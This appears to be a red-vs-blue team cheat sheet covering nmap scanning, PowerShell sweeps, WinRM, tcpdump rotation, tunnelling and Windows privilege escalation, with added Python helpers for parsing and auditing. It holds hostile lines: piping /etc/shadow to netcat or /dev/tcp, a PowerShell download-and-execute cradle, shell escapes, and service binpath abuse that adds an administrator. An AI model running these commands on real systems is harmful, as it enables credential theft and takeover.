RvB

Methodology

  1. Recon
  2. Initial Access
  3. Privilege Escalation
  4. Pivoting
  5. Execution

Scripts

Tools

Practice

Links

Topics

Frameworks

Scanners

Shells

Metasploit

Powershell

Enter-PSSession

  • The remote computer must be configured for remote management; enabling it fails while any network connection on the host is set to the Public profile
    • Enable-PSRemoting -Force

Nmap

  • xsltproc converts nmap's XML output (-oX, or the .xml written by -oA) to HTML: xsltproc scan.xml -o scan.html

Scanning plan

  1. ping all hosts
    • nmap -T4 -sn -oA ping_hosts_scan -iL targets.txt
  2. syn scan of all hosts
    • nmap -T5 -F -sS -Pn -n -oA syn_hosts_scan -iL targets.txt
  3. take individual IPs, do an intense scan, place results in doc (1 line from nmap result file)
    • sudo nmap -T4 -v -p- -sV --version-all -sC -O -Pn -n -oA intense_scan_$TARGET $TARGET
    • sudo nmap -T4 -v -p- -A -O -Pn -n -oA intense_scan_$TARGET $TARGET
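Step 3 of the plan ends with one line per host copied from the nmap result file. The -oA option already writes an XML file alongside the .nmap and .gnmap output, and that XML is the easiest form to turn into a one-line inventory entry. The following Python script is an added example, not part of the original cheat sheet: it parses a small constructed nmap XML document (trimmed to the elements the summary needs, with made-up addresses and service banners) and prints one line per live host listing hostname, OS guess and open ports with their detected services.

```python
import xml.etree.ElementTree as ET

# Constructed sample in the shape of nmap's -oX/-oA XML output (not a real scan).
# One host is up with two open ports and one closed port; the second host is down.
SAMPLE_NMAP_XML = """<nmaprun scanner="nmap" args="nmap -T4 -sV -oA intense_scan_10.10.10.5 10.10.10.5">
  <host>
    <status state="up" reason="syn-ack"/>
    <address addr="10.10.10.5" addrtype="ipv4"/>
    <hostnames><hostname name="web01.lab.local" type="PTR"/></hostnames>
    <ports>
      <port protocol="tcp" portid="22">
        <state state="open" reason="syn-ack"/>
        <service name="ssh" product="OpenSSH" version="8.2p1"/>
      </port>
      <port protocol="tcp" portid="80">
        <state state="open" reason="syn-ack"/>
        <service name="http" product="nginx" version="1.18.0"/>
      </port>
      <port protocol="tcp" portid="443">
        <state state="closed" reason="reset"/>
      </port>
    </ports>
    <os><osmatch name="Linux 5.X" accuracy="95"/></os>
  </host>
  <host>
    <status state="down" reason="no-response"/>
    <address addr="10.10.10.6" addrtype="ipv4"/>
  </host>
</nmaprun>
"""


def parse_nmap_xml(xml_text):
    """Return one dict per host that nmap reported as up, with its open ports."""
    root = ET.fromstring(xml_text)
    hosts = []
    for host in root.findall("host"):
        status = host.find("status")
        if status is None or status.get("state") != "up":
            continue  # skip hosts that did not respond
        addr_el = host.find("address[@addrtype='ipv4']")
        addr = addr_el.get("addr") if addr_el is not None else "?"
        hn = host.find("hostnames/hostname")
        hostname = hn.get("name") if hn is not None else ""
        osm = host.find("os/osmatch")  # best OS match, present only with -O/-A
        os_name = osm.get("name") if osm is not None else ""
        open_ports = []
        for port in host.findall("ports/port"):
            st = port.find("state")
            if st is None or st.get("state") != "open":
                continue
            svc = port.find("service")
            svc_desc = ""
            if svc is not None:
                parts = (svc.get("name"), svc.get("product"), svc.get("version"))
                svc_desc = " ".join(p for p in parts if p)
            open_ports.append((int(port.get("portid")), port.get("protocol"), svc_desc))
        hosts.append({"addr": addr, "hostname": hostname, "os": os_name, "open_ports": open_ports})
    return hosts


def one_line_summary(host):
    """Format a parsed host as a single line suitable for pasting into a findings doc."""
    ports = ",".join(f"{p}/{proto}({svc})" if svc else f"{p}/{proto}"
                     for p, proto, svc in host["open_ports"])
    label = host["addr"] + (f" ({host['hostname']})" if host["hostname"] else "")
    os_part = f" os={host['os']}" if host["os"] else ""
    return f"{label}{os_part} open={ports or 'none'}"


if __name__ == "__main__":
    for h in parse_nmap_xml(SAMPLE_NMAP_XML):
        print(one_line_summary(h))
```

To use it on a real scan, read the `intense_scan_$TARGET.xml` file that -oA produced and pass its text to `parse_nmap_xml`; hosts that never answered are dropped, and closed or filtered ports are left out of the line so only the exposed services remain.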

Network scan

```shell
nmap -T5 -F -sS [range] -oA [filename]
nmap -T5 -F -sS -Pn -n -oA quick_scan -iL targets.txt
nmap -T5 -sn -oA quick_ping_scan -iL targets.txt
nmap -F -sS -Pn -n -f --mtu 32 --ttl 64 -e eth0 -oA slow_scan -iL targets.txt
nmap -sn -oA slow_ping_scan -iL targets.txt
```

Specific host

```shell
nmap -T5 -F -sS -O -Pn -n [IP] -oN [filename]
nmap -T5 -F -sV -O -Pn -n [IP] -oA [filename]
nmap -T5 -A -Pn -n [IP] -oA [filename]
nmap -T5 -p- -sV -O -Pn -n [IP] -oN [filename]
nmap -T5 -p[open ports] -sC -Pn -n [IP] -oN [filename]
nmap -T5 -p- -sV --version-all -sC -O -Pn -n -oN all_ports_$TARGET $TARGET
nmap -f --mtu 32 --ttl 64 -e eth0 -p- -sV --version-all -sC -O -Pn -n -oN all_ports_$TARGET $TARGET
```

Other helpful flags

```text
--reason
--open
-v
--script=
  * nbstat.nse [IP]
  * smb-enum-users.nse [IP] -p 139
  * http-robots.txt.nse [IP] -p 80
-f --mtu 32 -D 192.168.1.1,192.168.1.2,10.10.10.10,143.158.56.2 --ttl 64 -e [interface]
--version-all (with -sV)
```

nmapAutomator

  • Works best for single host

IVRE

  • Works best for networks

Powershell scans

Ping sweep from a cmd.exe prompt:

```cmd
(for /L %a IN (1,1,254) DO ping /n 1 /w 3 192.168.0.%a) | find "Reply" > C:\path\file
```

Ping sweep plus a single-port TCP connect check from PowerShell:

```powershell
$port = 0                  # TCP port to probe; set this before running (0 is not a usable port)
$network = "192.168.0"     # first three octets only; the loop appends the last octet
$range = 1..254
$ErrorActionPreference = 'SilentlyContinue'
$(Foreach ($add in $range)
{
    $ip = "{0}.{1}" -F $network, $add
    Write-Progress "Scanning Network" $ip -PercentComplete (($add / $range.Count) * 100)
    If (Test-Connection -BufferSize 32 -Count 1 -Quiet -ComputerName $ip)
    {
        # Hosts that answer ping get one TCP connect attempt on $port
        $socket = New-Object System.Net.Sockets.TcpClient($ip, $port)
        If ($socket.Connected) { "$ip port $port open"; $socket.Close() }
        else { "$ip port $port not open" }
    }
}) | Out-File C:\path\file.csv
```

Recon-ng

```text
recon-ng --no-check
--help
--show modules
--search
--use [module ex. recon/netblocks-hosts/reverse_resolve] then --show info (get info on that module) or --show options
--add netblocks [ip ex. 10.10.10.0/24]
--run (execute the module)
--show hosts
--back (gets out of module)
```

To find which antivirus is in use, discovery/info_disclosure/cache_snoop snoops a DNS resolver's cache for AV vendor domains; it needs --set NAMESERVER [ip] before --run.

WinRM

From Linux

sudo pip install pywinrm

```python
import winrm

# SERVER, USER and PASS are placeholders for the target host and the account used
s = winrm.Session(SERVER, auth=(USER, PASS))
r = s.run_cmd('whoami')
# r = s.run_cmd('ipconfig', ['all'])   # cmd.exe command with arguments
# r = s.run_ps('gci')                  # PowerShell command instead of cmd.exe
print(r.status_code)
print(r.std_out)
print(r.std_err)
```

From Windows

Privilege Escalation

Nix

SCP

  • Copy the file “foobar.txt” from a remote host to the local host
    • $ scp your_username@remotehost.edu:foobar.txt /some/local/directory
  • Copy the file “foobar.txt” from the local host to a remote host
    • $ scp foobar.txt your_username@remotehost.edu:/some/remote/directory

FTP

```text
get [file]
mget [*files]
put [file]
mput [*files]
```

iptables

  • Drop packets to destination port 2018 whose payload contains the string "test" (--dport needs a protocol, hence -p tcp; bm is the Boyer-Moore search algorithm)
    • iptables -A INPUT -p tcp --dport 2018 -m string --algo bm --string "test" -j DROP

Logging

tcpdump

Examples:

```shell
tcpdump -i any          # easiest
tcpdump host [ip]
tcpdump src [ip]
tcpdump dst [ip]
tcpdump net [ip]/24
tcpdump port [port]
tcpdump src port [port]
```

General form (add -X to also dump packet contents in hex and ASCII):

```shell
tcpdump -nn(X) [tcp/udp] and [dst/src/host] [ip] and port [port]
tcpdump -nn(X) host 10.10.75.6 and net 10.10.10
```

Set the snaplength to 0 (-s0) so packets are captured whole.
https://danielmiessler.com/study/tcpdump/#basic-communication

Example:

```shell
tcpdump -i <interface> -nn -s0 -G 600 -w %H%M_[service]_log.pcap port <num> -v
```

  • -i <interface>: usually eth0; identify it with ifconfig and test to make sure you have the right one
  • -s0: snapshot length, i.e. how many bytes of each packet to capture; 0 means the whole packet
  • -w: output file; make it a .pcap and name it by creation time (with -G the name is a strftime pattern, so %H%M becomes the hour and minute the file was opened)
  • -G 600: rotate to a new file every 600 seconds (10 minutes)
  • -nn: don't convert addresses to names or resolve port numbers to service names
  • port <num>: capture filter so only the service's traffic is captured
  • -v: verbosity, optional; -vv also exists
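The rotation scheme above (-G 600 with %H%M in the file name) leaves a directory of ten-minute pcaps per service, and during incident response the first question is usually "which file holds the traffic from 12:17?". The Python below is an added example, not part of the original notes: it indexes a constructed directory listing that follows the %H%M_[service]_log.pcap pattern and returns the file whose rotation window covers a given time. It assumes service names contain no underscores and that the rotation interval is the 600 seconds used in the command.

```python
import re
from datetime import timedelta

# Matches the %H%M_[service]_log.pcap naming from the tcpdump command above
# (assumes the service name contains no underscore).
PCAP_NAME = re.compile(r"^(?P<hh>\d{2})(?P<mm>\d{2})_(?P<service>[^_]+)_log\.pcap$")
ROTATE_SECONDS = 600  # the -G 600 rotation interval

# Constructed directory listing (not real files): http captures rotated three times,
# dns captures rotated twice, plus an unrelated file that must be ignored.
SAMPLE_FILES = [
    "1200_http_log.pcap", "1210_http_log.pcap", "1220_http_log.pcap",
    "1200_dns_log.pcap", "1210_dns_log.pcap", "notes.txt",
]


def index_captures(filenames):
    """Return (service, start_time, filename) tuples sorted by start time."""
    entries = []
    for name in filenames:
        m = PCAP_NAME.match(name)
        if not m:
            continue  # not one of our rotated captures
        start = timedelta(hours=int(m.group("hh")), minutes=int(m.group("mm")))
        entries.append((m.group("service"), start, name))
    entries.sort(key=lambda e: e[1])
    return entries


def find_capture(filenames, service, hhmm):
    """Return the file for `service` whose rotation window covers hhmm ("HH:MM"), or None.

    Each file holds ROTATE_SECONDS of traffic starting at the time in its name,
    so the window it covers is [start, start + ROTATE_SECONDS).
    """
    hours, minutes = (int(x) for x in hhmm.split(":"))
    wanted = timedelta(hours=hours, minutes=minutes)
    window = timedelta(seconds=ROTATE_SECONDS)
    for svc, start, name in index_captures(filenames):
        if svc == service and start <= wanted < start + window:
            return name
    return None


if __name__ == "__main__":
    # An alert fired at 12:17 against the web service: which capture holds that traffic?
    print(find_capture(SAMPLE_FILES, "http", "12:17"))
```

Two caveats follow from the naming: the first file starts when tcpdump starts, so window boundaries are only aligned to :00/:10 if tcpdump was, and the name carries the real start time, which is why the lookup trusts the name rather than assuming aligned windows. Also, %H%M carries no date, so tcpdump will open a file with the same name the next day and overwrite the old one; add %Y%m%d to the pattern if captures must be kept longer than a day.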

Powershell

```powershell
powershell -nop -c "iex(New-Object Net.WebClient).DownloadString('http://whatever')"
```

```powershell
Enable-PSRemoting -Force
$credential = Get-Credential -Credential nwtraders\administrator   # example account; prompts for the password
Invoke-Command -ComputerName [COMPUTER] -ScriptBlock { COMMAND } -Credential $credential
Copy-Item -Path \\server\share\file -Destination C:\path\
$wc = New-Object System.Net.WebClient
$wc.DownloadFile("http://whatever", "C:\path\file")
Invoke-WebRequest -Uri "http://whatever" -OutFile "C:\path\file"
```

Tunnelling

  • netsh interface portproxy add v4tov4 listenport=[LPORT] listenaddress=0.0.0.0 connectport=[RPORT] connectaddress=[RHOST]
  • ssh [user]@[hop] -L[127.0.0.1]:[LPORT]:[RHOST]:[RPORT]
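A portproxy rule like the one above survives reboots, so from the blue-team side the matching check is to list what `netsh interface portproxy show all` reports on each host and compare it with the forwards the host is actually supposed to have. The Python below is an added example, not part of the original notes: it parses a constructed copy of that command's output (the addresses and ports are made up) and flags every rule that is not on an allowlist, noting whether it listens on all interfaces and whether it forwards traffic off-host.

```python
import re
from ipaddress import ip_address

# Constructed text in the layout `netsh interface portproxy show all` prints;
# not captured from a real host, and the values are made up.
SAMPLE_NETSH_OUTPUT = """
Listen on ipv4:             Connect to ipv4:

Address         Port        Address         Port
--------------- ----------  --------------- ----------
0.0.0.0         4444        10.10.10.5      3389
127.0.0.1       8080        10.0.0.7        80
*               9000        fileserver      445
"""

# One forwarding rule per line: listen address, listen port, connect address, connect port.
# Header, separator and blank lines never have a number in the second column, so they fail to match.
RULE_ROW = re.compile(r"^(\S+)\s+(\d+)\s+(\S+)\s+(\d+)$")


def parse_portproxy(text):
    """Return the v4tov4 rules as dicts, skipping headers and separators."""
    rules = []
    for line in text.splitlines():
        m = RULE_ROW.match(line.strip())
        if m:
            rules.append({
                "listen_addr": m.group(1), "listen_port": int(m.group(2)),
                "connect_addr": m.group(3), "connect_port": int(m.group(4)),
            })
    return rules


def audit_portproxy(rules, allowlist=frozenset()):
    """Return (rule_key, reasons) for every rule not on the allowlist.

    allowlist holds (listen_addr, listen_port, connect_addr, connect_port) tuples
    for forwards the host is known to need; anything else is reported.
    """
    findings = []
    for r in rules:
        key = (r["listen_addr"], r["listen_port"], r["connect_addr"], r["connect_port"])
        if key in allowlist:
            continue
        reasons = []
        if r["listen_addr"] in ("0.0.0.0", "*"):
            reasons.append("listens on every interface")
        try:
            if not ip_address(r["connect_addr"]).is_loopback:
                reasons.append("forwards to another host")
        except ValueError:
            reasons.append("forwards to a hostname")  # netsh accepts names as well as IPs
        if not reasons:
            reasons.append("not on the allowlist")
        findings.append((key, reasons))
    return findings


if __name__ == "__main__":
    rules = parse_portproxy(SAMPLE_NETSH_OUTPUT)
    known = frozenset({("127.0.0.1", 8080, "10.0.0.7", 80)})
    for key, reasons in audit_portproxy(rules, known):
        print("%s:%d -> %s:%d  [%s]" % (*key, "; ".join(reasons)))
```

On a real host, feed the script the captured command output; the allowlist is the place to record the few forwards an administrator set up deliberately, so that anything new stands out on the next run.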

Misc

  • Shell upgrade: python -c "import pty;pty.spawn('/bin/sh');"
  • vi escape: :!bash

To Sort

https://github.com/21y4d/nmapAutomator
https://github.com/sethsec/celerystalk

symbolic links in linux
/proc/self/environ

Networking
- `cat /etc/shadow | nc [IP] [port]`
- `cat /etc/shadow > /dev/tcp/[IP]/[port]`



linux watch command

creds in files

```cmd
dir /b /s web.config
dir /b /s unattend.xml
dir /b /s sysprep.inf
dir /b /s sysprep.xml
dir /b /s *pass*
```
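Finding an unattend.xml is only half the check; the other half is whether it actually carries credentials, since the schema stores them either as plain text or as base64 of the UTF-16LE password with the element name ("Password" or "AdministratorPassword") appended, which is obfuscation rather than protection. The Python below is an added example, not part of the original notes: it walks a constructed unattend.xml fragment (made-up accounts and passwords), reports each password element with the account it belongs to and how it was stored, and recovers the base64 form to show that it is readable, which is the evidence a remediation ticket to remove leftover answer files needs.

```python
import base64
import xml.etree.ElementTree as ET


def encode_unattend_value(password, element):
    """The obfuscation unattend.xml uses when PlainText is false: base64 of the
    UTF-16LE password with the element name appended."""
    return base64.b64encode((password + element).encode("utf-16-le")).decode("ascii")


# Constructed fragment (not from a real image) showing both storage forms.
SAMPLE_UNATTEND = """<unattend xmlns="urn:schemas-microsoft-com:unattend">
  <settings pass="oobeSystem">
    <component name="Microsoft-Windows-Shell-Setup">
      <AutoLogon>
        <Password>
          <Value>Winter2024!</Value>
          <PlainText>true</PlainText>
        </Password>
        <Enabled>true</Enabled>
        <Username>Administrator</Username>
      </AutoLogon>
      <UserAccounts>
        <LocalAccounts>
          <LocalAccount>
            <Password>
              <Value>ENCODED_VALUE</Value>
              <PlainText>false</PlainText>
            </Password>
            <Name>svc_deploy</Name>
            <Group>Administrators</Group>
          </LocalAccount>
        </LocalAccounts>
      </UserAccounts>
    </component>
  </settings>
</unattend>
""".replace("ENCODED_VALUE", encode_unattend_value("Deploy#1", "Password"))


def _local(tag):
    return tag.rsplit("}", 1)[-1]  # strip the XML namespace from a tag


def _walk(el, parent, out):
    """Collect (password_element, parent_element) pairs in document order."""
    if _local(el.tag) in ("Password", "AdministratorPassword"):
        out.append((el, parent))
    for child in el:
        _walk(child, el, out)


def find_unattend_passwords(xml_text):
    """Report each stored password: account, storage form, and the readable value."""
    found = []
    _walk(ET.fromstring(xml_text), None, found)
    findings = []
    for el, parent in found:
        tag = _local(el.tag)
        value = plaintext = None
        for child in el:
            if _local(child.tag) == "Value":
                value = (child.text or "").strip()
            elif _local(child.tag) == "PlainText":
                plaintext = (child.text or "").strip().lower() == "true"
        if not value:
            continue
        # The account name is a sibling element (Username under AutoLogon, Name under LocalAccount)
        account = "Administrator" if tag == "AdministratorPassword" else ""
        for sib in (parent if parent is not None else []):
            if _local(sib.tag) in ("Name", "Username"):
                account = (sib.text or "").strip()
        stored_plain = plaintext is True
        recovered = value
        if not stored_plain:
            try:
                recovered = base64.b64decode(value, validate=True).decode("utf-16-le")
                if recovered.endswith(tag):
                    recovered = recovered[: -len(tag)]
            except (ValueError, UnicodeDecodeError):
                stored_plain = True  # not the base64 form, so it was written as-is
                recovered = value
        findings.append({"account": account,
                         "storage": "plaintext" if stored_plain else "base64",
                         "password": recovered})
    return findings


if __name__ == "__main__":
    for f in find_unattend_passwords(SAMPLE_UNATTEND):
        print(f"{f['account']}: stored as {f['storage']}, value is readable")
```

Run it over every unattend.xml and sysprep.xml the dir commands above turn up; a non-empty result means the file should be removed from the image or host, and the listed accounts' passwords rotated.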
post/windows/gather/enum_patches

exploit/windows/local/
	ppr_flatten_rec
	always_install_elevated

at windows prompt

```cmd
accesschk.exe -qwcu "Authenticated Users" *
accesschk.exe -qwcu "Users" *
accesschk.exe -qwcu "Everyone" *

rem sc takes the service name (not the .exe) and needs a space after binpath=
sc config [weak service] binpath= "net user person pass /add"
sc start [weak service]
sc config [weak service] binpath= "net localgroup administrators person /add"
sc start [weak service]

accesschk.exe -qwsu "Authenticated Users" C:\
accesschk.exe -qwsu "Users" C:\
accesschk.exe -qwsu "Everyone" C:\
```

This post is licensed under CC BY 4.0 by the author.